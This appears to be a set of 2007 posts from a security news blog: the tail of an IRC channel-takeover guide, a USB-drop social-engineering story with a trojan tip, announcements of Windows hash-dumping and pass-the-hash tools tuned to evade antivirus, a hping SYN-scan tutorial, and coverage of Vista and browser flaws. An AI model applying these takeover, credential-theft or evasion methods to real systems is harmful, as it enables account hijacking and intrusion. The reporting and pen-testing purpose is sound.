If your impersonation is good enough, 9/10 times they’ll op you. Like I said before, IMMEDIATELY do a mass deop. If possible, bring AT LEAST two bots (real bots, not just simple clones) into the channel to hold it and protect it.

If you followed all these steps thoroughly, you should be able to takeover most channels as long as there are at least 2 human ops (1 of which you’ll be ’spoofing’, the other you’ll be messaging to op you).

Good luck and have fun!

Originally by St0rmer from EFNet, updated by Darknet.

Kevin Mitnick Interview on Social Engineering

2007-11-25T17:31:00.003-08:00

There’s a good interview with Kevin Mitnick on Social Engineering.

Well afterall, that is where his skill lies, not in technical hacking.

Arrested by the FBI in 1995 and convicted of breaking into the systems of Fujitsu Siemens, Nokia and Sun Microsystems, Mitnick served five years in prison–eight months of it in solitary confinement.

In his days on the wrong side of the law, Mitnick used so-called social-engineering techniques to fool users into handing over sensitive information. Rather than overt technical hacks, he was able to convince employees to hand over information that enabled him to hack systems, while redirecting telephone signals to avoid detection by the authorities.

As always the answer to social engineering is education!

Are you seeing any new attack methods?
Mitnick: They use the same methods they always have–using a ruse to deceive, influence or trick people into revealing information that benefits the attackers. These attacks are initiated, and in a lot of cases, the victim doesn’t realize. Social engineering plays a large part in the propagation of spyware. Usually, attacks are blended, exploiting technological vulnerabilities and social engineering.

What can businesses do to safeguard themselves?
Mitnick: Businesses should train people to try to recognize possible attacks.

The interview is a good read anyway, do check it out. You can also check out Mitnicks book on Social Engineering

‘Free’ USB Drives Defeat Company Security

2007-11-25T17:31:00.002-08:00

This is an excellent case of Social Engineering, you could also consider it playing on human greed/ignorance/stupidity.

Whatever you want to label it really

USB drives are a real security risk..

We recently got hired by a credit union to assess the security of its network. The client asked that we really push hard on the social engineering button. In the past, they’d had problems with employees sharing passwords and giving up information easily. Leveraging our effort in the report was a way to drive the message home to the employees.

The client also indicated that USB drives were a concern, since they were an easy way for employees to steal information, as well as bring in potential vulnerabilities such as viruses and Trojans. Several other clients have raised the same concern, yet few have done much to protect themselves from a rogue USB drive plugging into their network.

They had to think up something a little different though as they had to bait employees that were already on high alert as they knew they were being audited.

I made my way to the credit union at about 6 a.m. to make sure no employees saw us. I then proceeded to scatter the drives in the parking lot, smoking areas, and other areas employees frequented.

Once I seeded the USB drives, I decided to grab some coffee and watch the employees show up for work. Surveillance of the facility was worth the time involved. It was really amusing to watch the reaction of the employees who found a USB drive. You know they plugged them into their computers the minute they got to their desks.

The stats are amazing, out of 20 drives, 15 were found…out of the 15 found ALL FIFTEEN were plugged into company computers.

A neat way to get in eh, next time you are asked to push the social engineering buttons during a penetration test or vulnerability assessment perhaps you can do this.

All you need is a few cheap USB drives and a custom trojan.

The Enemy Within The Firewall

2007-11-25T17:30:00.001-08:00

I’ve seen similar figures from other organisations and countries, so the stats don’t suprise me.

My peers and I have always called this Armadillo security, hard on the outside, soft on the inside.

Firewall, IDS, etc…all protecting the exterior of the network, only edge devices, nothing inside, not much policies, not much privelege segregation, anyone inside can wreak havoc.

Employees are now regarded as a greater danger to workplace cyber security than the gangs of hackers and virus writers launching targeted attacks from outside the firewall.

That is the perception of 75 per cent of Australian information technology managers who took part in an international IBM security survey.

Also e-mail and instant messaging is becoming increasingly pervasive, with the advent of things like Google Talk capabilities in the GMail interface, sending information outside the protective layer of the company is getting easier and easier.

From my professional experience, I do know some companies have extremely strict standards which are audited regularly (these include rules about removable media, BIOS passwords and OS hardening standards).

While 32 per cent of survey respondents were intent on upgrading firewalls, only 15 per cent planned to invest in awareness and education training for employees and only 10 per cent restricted the use of mobile devices such as wireless handheld computers not specifically sanctioned by the IT staff.

“Organisations need to understand what are the key pieces of information that need to be protected and be able to track who has had access to them,” she said.

Sounds normal, good intent, but no action. Time for companies to sort themselves out I think.

A recent security report from antivirus company Symantec said cybercrime represented today’s greatest threat to consumers’ digital lifestyle and to online businesses in general.

“While past attacks were designed to destroy data, today’s attacks are increasingly designed to silently steal data for profit without doing noticeable damage that would alert a user to its presence,” the company said.

Pass-The-Hash Toolkit v1.1 Available for Download

2007-11-24T04:26:00.000-08:00

The concept of passing the hash on Windows came about a while ago, now there’s a tool for it in it’s second revision (which fixed some problems with foreign language Windows versions and Windows 2003).

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).

Utilities in the toolkit:

IAM.EXE: Pass-The-Hash for Windows. This tool allows you to change your current NTLM credentials withouth having the cleartext password but the hashes of the password. The program receives a username, domain name and the LM and NT hashes of the password; using this it will change in memory the NTLM credentials associated with the current windows logon session.

WHOSTHERE.EXE: This tool will list logon sessions with NTLM credentials (username,domain name, LM and NT hashes). Logon sessions are created by windows services that log in using specific users, remote desktop connections, etc.

GENHASH.EXE: This is a small utility that generates LM and NT hashes using some ‘undocumented’ functions of the Windows API. This is a small tool to aid testing of IAM.EXE.

You can download Pass-The-Hash Toolkit v1.1 here:

Source:

pshtoolkit_src_v1.1.tgz

Binaries:

pshtoolkit_v1.1.tgz

Or you can read more here.

Download pwdump6 and fgdump version 1.6.0 available now.

2007-11-24T04:21:00.001-08:00

New versions of the excellent pwdump6 and fgdump have been released (1.6.0 for both!).

For those that don’t know what pwdump or gfdump are..

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

fgdump is a more powerful version of pwdump6. pwdump tends to hang and such when antivirus is present, so fgdump takes care of that by shutting down and later restarting a number of AV programs. It also can dump cached credentials and protected storage items, and can be run in a multithreaded fashion very easily. I strongly recommend using fgdump over pwdump6, especially given that fgdump uses pwdump6 under the hood! You’ll get everything pwdump6 gives you and a lot more.

Darknet definately DOES recommend fgdump, super cool update of the old favourite pwdump.

The primary change in both packages for version 1.6.0 is that they will once again, for the time being, sneak by antivirus more easily. This is strictly to allow the majority of the userbase, who are legitimate pen-testing users, to carry out their work unfettered.

fgdump was also fixed to correct a problem when running locally - if you’ve received the infamous “error 2″ message before, you should find that no longer occurs! As always, for pwdump6 users, I recommend highly that you switch to fgdump - I doubt you will regret it.

fgdump is targetted at the security auditing community, and is designed to be used for good, not evil. Note that, in order to effectively use fgdump, you’re going to need high-power credentials (Administrator or Domain Administrator, in most cases), thus limiting its usefulness as a hacking tool. However, hopefully some of you other security folks will find this helpful.

Get pwdump here

Get fgdump here

Vista Security Feature - Teredo Protocol Analysis

2007-11-24T04:21:00.000-08:00

Teredo is a platform-independent protocol developed by Microsoft, which is enabled by default in Windows Vista. Teredo provides a way for nodes located behind an IPv4 NAT to connect to IPv6 nodes on the Internet. However, by tunneling IPv6 traffic over IPv4 UDP through the NAT and directly to the end node, Teredo raises some security concerns.

Primary concerns include bypassing security controls, reducing defense in depth, and allowing unsolicited traffic. Additional security concerns associated with the use of Teredo include the capability of remote nodes to open the NAT for themselves, benefits to worms, ways to deny Teredo service, and the difficulty in finding all Teredo traffic to inspect.

You can find the report here:

Teredo Security [PDF]

We have completed an analysis of the Teredo protocol based on a reading of the RFC (and apart from any implementation). In this section, we highlight some of the more significant security implications of the protocol; that is, ways in which Teredo positively or negatively impacts the IPv4 and IPv6 portions of the Internet.

Vista Security Claims Debunked - Figures Skewed

2007-11-24T04:20:00.000-08:00

Ah more news about the insecurity of Vista and something we are all pretty aware of…the skewing of figures by Microsoft.

Microsoft apparently still hasn’t learned that counting vulnerabilities doesn’t establish some kind of ’security level’.

You can read the report here:

Vista 6 Month Vuln Report [PDF]

The Microsoft “researcher” claims that Windows Vista is exponentially less vulnerable than many Linux distributions and Mac OS X. It may be true that the default Vista installation has had less public vulnerability reports, and that Linux has had many more, but this is due to the nature of Open Source. Jeff does not include any “silently fixed” vulnerabilities that have been patched since Vista was released and Microsoft has not disclosed such vulnerabilities publicly.

The methodology used was deeply flawed, as I briefly mentioned before, bugs in Firefox and other software like emacs count as a flaw for Linux whilst IE bugs get ignored for Vista.

The conclusions that are drawn are built on a lack of understanding by the Microsoft researcher. I highly encourage him to go back and take another look, and pare down the results to essential information that is absolutely critical to the conclusions, rather than just “Other OS’s have more bugs, see, look at my graphs”…

Good PR, but bad research? Seems par for the course.

And perhaps it could backfire PR wise, as the clued in people get pushed further away from Vista.

PowerShell - More than the command prompt

2007-11-24T04:19:00.000-08:00

For this article you should thank Patrick Ogenstad and his comment on my post , because I did not know about PowerShell until he mentioned about it… so a white point for him =)
The parts that will follow are snippets from the Getting Started document that comes with it…

Abstract

Windows PowerShell™ is a new Windows command-line shell designed especially for system administrators. The shell includes an interactive prompt and a scripting environment that can be used independently or in combination.

Introducing Windows PowerShell

Most shells, including Cmd.exe and the SH, KSH, CSH, and BASH Unix shells, operate by executing a command or utility in a new process, and presenting the results to the user as text. Over the years, many text processing utilities, such as sed, AWK, and PERL, have evolved to support this interaction.
These shells also have commands that are built into the shell and run in the shell process, such as the typeset command in KSH and the dir command in Cmd.exe. In most shells, because there are few built-in commands.many utilities have been created.
Windows PowerShell is very different.

Windows PowerShell does not process text. Instead, it processes objects based on the .NET platform.
Windows PowerShell comes with a large set of built-in commands with a consistent interface.
All shell commands use the same command parser, instead of different parsers for each tool. This makes it much easier to learn how to use each command.

Best of all, you don’t have to give up the tools that you have become accustomed to using. You can still use the traditional Windows tools, such as Net, SC, and Reg.exe in Windows PowerShell.

Windows PowerShell Cmdlets

A cmdlet (pronounced “command-let”) is a single-feature command that manipulates objects in Windows PowerShell. You can recognize cmdlets by their name format — a verb and noun separated by a dash (-), such as Get-Help, Get-Process, and Start-Service.

In traditional shells, the commands are executable programs that range from the very simple (such as attrib.exe) to the very complex (such as netsh.exe).

In Windows PowerShell, most cmdlets are very simple, and they are designed to be used in combination with other cmdlets. For example, the “get” cmdlets only retrieve data, the “set” cmdlets only establish or change data, the “format” cmdlets only format data, and the “out” cmdlets only direct the output to a specified destination.
Each cmdlet has a help file that you can access by typing:

get-help -detailed

The detailed view of the cmdlet help file includes a description of the cmdlet, the command syntax, descriptions of the parameters, and example that demonstrate use of the cmdlet.

…and more

Besides the above mentioned things, powerShell also includes: a new scripting language (not the lame-ass batch), processes objects, object pipelines, interaction, etc. If you are interested take a look at microsoft.com/powershell

Once again thanks to Patrick….

VBootkit Bypasses Vista’s Digital Code Signing

2007-11-24T04:13:00.001-08:00

At Black Hat Europe (in Amsterdam) security experts from India (Nitin and Vipin Kumar of NV labs) demonstrated a special boot loader that gets around Vista’s code-signing mechanisms. Known as VBoot and launching from a CD and booting Vista it can make on-the-fly changes in memory and in files being read.

In a demonstration, the “boot kit” managed to run with kernel privileges and issue system rights to a CMD shell when running on Vista RC2 (build 5744), even without a Microsoft signature.

Experts say that the fundamental problem that this highlights is that every stage in Vista’s booting process works on blind faith that everything prior to it ran cleanly. The boot kit is therefore able to copy itself into the memory image even before Vista has booted and capture interrupt 13, which operating systems use for read access to sectors of hard drives, among other things.

As soon as the NT Boot sector loads Bootmgr.exe, VBootkit patches the security queries that ensure integrity and copies itself into an unused area of memory. Something similar is done with the subsequent boot stages of Winload.exe and NTOSKrnl.exe so that the boot kit is running in the background when the system is finally booted; at no time are Vista’s new security mechanisms, which were intended to prevent unsigned code from being executed with kernel privileges, set off.

Interesting eh, seen as though Microsoft touts Vista as so secure…and it’s already been taken apart.

It might lead to some interesting workarounds for DRM and video content protection.

From the Black Hat release:

Vboot kit is first of its kind technology to demonstrate Windows vista kernel subversion using custom boot sector. Vboot Kit shows how custom boot sector code can be used to circumvent the whole protection and security mechanisms of Windows Vista. The booting process of windows Vista is substantially different from the earlier versions of Windows. The talk will give you:

details and know abouts for the Vista booting process.
explain the vboot kit functionality and how it works.
insight into the Windows Vista Kernel.

We will also review sample Ring 0 Shell code (for Vista). The sample shellcode effectively raises the privileges of certain programs to SYSTEM. A live demonstration of vboot kit POC will be done.

Piping Data in DOS on Windows - Video

2007-11-24T04:13:00.000-08:00

Well this is my last week of exams, and today I got a free day, tomorrow it will be maths… Anyway while waiting for somebody I got bored and decided to make a small (tiny) video about piping data under windows, you know | …

In Unix-like computer operating systems, a pipeline is the original software pipeline: a set of processes chained by their standard streams, so that the output of each process (stdout) feeds directly as input (stdin) of the next one.

More at Wikipedia - Pipeline (UNIX)

As always a link on youtube (better quality than the last 2 videos): Tips&Tricks About Piping Data
A download link: Piping_data.wmv
My youtube channel =)

Fake NetBIOS Tool - Simulate Windows Hosts

2007-11-24T04:11:00.000-08:00

Some cool free tools made by folks from the French Honeynet Project.

FakeNetBIOS is a family of tools designed to simulate Windows hosts on a LAN. The individual tools are:

FakeNetbiosDGM (NetBIOS Datagram)
FakeNetbiosNS (NetBIOS Name Service)

Each tool can be used as a standalone tool or as a honeyd responder or subsystem.

FakeNetbiosDGM sends NetBIOS Datagram service packets on port UDP 138 to simulate Windows hosts bradcasts. It sends periodically NetBIOS announces over the network to simulate Windows computers. It fools the Computer Browser services running over the LAN and so on.

FakeNetbiosNS is a NetBIOS Name Service daemon, listening on port UDP 137. It responds to NetBIOS Name requests like real Windows computers: for example ‘ping -a’, ‘nbtstat -A’ and ‘nbtstat -a’, etc.

You can download the tools here:

FakeNetBIOS-0.91.zip

There are a few others things here:

http://honeynet.rstack.org/tools.php

Netstat Revealed!

2007-11-24T04:10:00.001-08:00

Another video in 2-3 days… I think i this becoming like a mania for me… Anyway in this video i played around with netstat so that for those who do not play with it could see the possibilities it offers to us… no more tutorials like:

netstat -a
to view all you connections
the end

… because I have seen to many of this of tuts when they speak about netstat… anyway check it out and tell me your opinion… you know it… youtube for lame quality mediafire for good quality (i got a channel)

Video: netstat revealed
Channel: my youtube channel
Download: netstat.avi

stealth techniques - syn

2007-11-24T04:10:00.000-08:00

Or half-open scanning technique is the first of three to come series about stealth scanning… The other two are Xmas/Fin/Null and idle/zombie scan techniques…

Intro
This is a series of three to come articles about stealth scanning, everything that I am going to present is hping oriented so if you want to learn this techniques you’d better get a copy of hping.
This method is invoked when you add nmap the -sS parameter… so let’s start…

3 Way Handshake
If you didn’t know a tcp connection is based on a method called the three way handshake, that goes like this:

[host] syn flagged packet ———> [destination] receives packet
[destination] syn-ack flagged packet ———> [host] receives packet
[host] ack flagged packet ———> [destination] receives packet [connection established]

This is the methodology of a TCP connection, just upon a successful execution of this section a real connection is done… You probably can see a weak point in this method, can’t you. For every sent packet the host (and destination) waits a period of time for the next packet. If you can send really fast spoofed syn packets you can DoS a target in no time, this is the oldest DoSing method ever known to man (and women) =)

SYNner
Firstly let’s see what happens if we hit a closed port, try out the following command (and result after it):

C:\\>hping -p 81 -S lx.ro
HPING (XPSP2) lx.ro (SiS 900 PCI Fast Ethernet Adapter -
Packet Scheduler Miniport 81.181.218.80): S set, 40 headers + 0
data bytes

len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=81 flags=RA seq=0
win=0 rtt=70.0 ms
len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=81 flags=RA seq=1
win=0 rtt=20.0 ms
len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=81 flags=RA seq=2
win=0 rtt=30.0 ms
len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=81 flags=RA seq=3
win=0 rtt=40.0 ms

As you can see on an unsuccessful port scan we get a Reset-Acknowledge , which tels us, as already mentioned, that we hit a closed port…
Now for the moment we all were waiting for:

C:\\>hping -p 80 -S lx.ro
HPING (XPSP2) lx.ro (SiS 900 PCI Fast Ethernet Adapter -
Packet Scheduler Miniport 81.181.218.80): S set, 40 headers + 0
data bytes

len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=80 flags=SA seq=0
win=5840 rtt=30.0 ms
len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=80 flags=SA seq=0
win=5840 rtt=0.0 ms
len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=80 flags=SA seq=1
win=5840 rtt=50.0 ms
len=46 ip=81.181.218.80 ttl=54 DF id=0 sport=80 flags=SA seq=0
win=5840 rtt=0.0 ms

As you can see we hit an open port… If you weren’t attentive till now a syn-ack flag means an open port, half-way connected…

Epilogue
Nowadays this method isn’t as stealthy as it was years ago, because now firewalls most often drop unwanted packets or sees them as pre-DoS syn packets…

More info about TCP :: www.rhyshaden.com
(first useful link that I have found with google)

Next >> Xmas/Fin/Null

Zalewski (lcamtuf) Strikes Again - More Vulnerabilites in IE and Firefox

2007-11-24T04:09:00.001-08:00

Our Polish friend and expert security researcher, Michal Zalewski (lcamtuf), known for his endless stream of vulnerabilities in all manners of software, has struck again.

This time with some pretty serious flaws in both Internet ~~Exploder~~ Explorer and Firefox. This time it’s 4, 2 in IE and 2 in Firefox.

The first which effects fully patched IE6 and IE7 is pretty serious and can result in cookie theft, cooking setting, page hijacking or memory corruption.

It’s based on a page update Race Condition (aka bait and switch vuln).

When Javascript code instructs MSIE6/7 to navigate away from a page that meets same-domain origin policy (and hence can be scriptually accessed and modified by the attacker) to an unrelated third-party site, there is a window of opportunity for concurrently executed Javascript to perform actions with the permissions for the old page, but actual content for the newly loaded page

The demo can be found here:

http://lcamtuf.coredump.cx/ierace/

The more serious of the two Firefox flaws is marked MAJOR and not CRITICAL and deals with the way the browser handles IFRAMEs (Cross-site IFRAME hijacking)

Javascript can be used to inject malicious code, including key-snooping event handlers, on pages that rely on IFRAMEs to display contents or store state data / communicate with the server.

A demo can be found here:

http://lcamtuf.coredump.cx/ifsnatch/

The full e-mail with details of his vulnerabilities can be found here:

[Full-disclosure] Assorted browser vulnerabilities

You can also read more at The Register or eWeek.

Nemesis - Packet Injection Suite

2007-11-24T04:09:00.000-08:00

Nemesis is a command-line network packet crafting and injection utility for UNIX-like and Windows systems. Nemesis, is well suited for testing Network Intrusion Detection Systems, firewalls, IP stacks and a variety of other tasks. As a command-line driven utility, Nemesis is perfect for automation and scripting.

Nemesis can natively craft and inject packets for:

ARP
DNS
ETHERNET
ICMP
IGMP
IP
OSPF
RIP
TCP
UDP

Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected.

Unix-like systems require: libnet-1.0.2a, and a C compiler (GCC)
Windows systems require: libnetNT-1.0.2g and either WinPcap-2.3 or WinPcap-3.0

Download it here:

Source code: nemesis-1.4.tar.gz (Build 26)
Windows binary: nemesis-1.4.zip (Build 26) (includes LibnetNT)

You can read more here:

Nemisis at Sourceforge